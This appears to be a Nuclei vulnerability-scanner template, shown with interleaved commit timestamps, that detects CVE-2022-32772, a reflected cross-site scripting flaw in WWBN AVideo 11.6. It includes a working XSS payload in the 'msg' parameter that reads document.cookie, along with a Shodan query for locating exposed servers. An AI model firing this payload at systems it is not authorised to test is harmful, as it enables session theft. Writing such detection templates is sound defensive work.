2022-08-28 07:51:09 +00:00
id : CVE-2022-32772
info :
2022-09-09 17:34:37 +00:00
name : WWBN AVideo 11.6 - Cross-Site Scripting
2022-08-28 07:51:09 +00:00
author : arafatansari
2022-09-16 20:03:07 +00:00
severity : medium
2022-08-28 07:51:09 +00:00
description : |
2022-09-16 19:50:10 +00:00
WWBN AVideo 11.6 contains a cross-site scripting vulnerability in the footer alerts functionality via the 'msg' parameter, which is inserted into the document with insufficient sanitization.
2022-08-28 07:51:09 +00:00
reference :
- https://talosintelligence.com/vulnerability_reports/TALOS-2022-1538
2022-08-29 20:34:27 +00:00
- https://github.com/WWBN/AVideo/blob/e04b1cd7062e16564157a82bae389eedd39fa088/updatedb/updateDb.v12.0.sql
2022-09-16 19:50:10 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-32772
2022-08-28 09:26:59 +00:00
classification :
2022-09-16 20:03:07 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2022-09-16 19:50:10 +00:00
cve-id : CVE-2022-32772
2022-09-16 20:03:07 +00:00
cwe-id : CWE-79
2022-08-28 07:51:09 +00:00
metadata :
shodan-query : http.html:"AVideo"
2022-08-29 20:34:27 +00:00
verified : "true"
2022-08-29 16:41:43 +00:00
tags : cve,cve2022,avideo,xss,wwbn
2022-08-28 07:51:09 +00:00
requests :
2022-08-28 09:26:59 +00:00
- method : GET
path :
- "{{BaseURL}}/index.php?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"
2022-08-28 07:51:09 +00:00
matchers-condition : and
matchers :
2022-08-28 09:26:59 +00:00
- type : word
part : body
words :
- 'avideoAlertInfo("</script><script>alert(document.cookie);</script>'
2022-08-28 07:51:09 +00:00
- type : word
2022-08-28 09:26:59 +00:00
part : header
2022-08-28 07:51:09 +00:00
words :
2022-08-28 09:26:59 +00:00
- text/html
- type : status
status :
- 200
2022-09-16 19:50:10 +00:00
# Enhanced by mp on 2022/09/14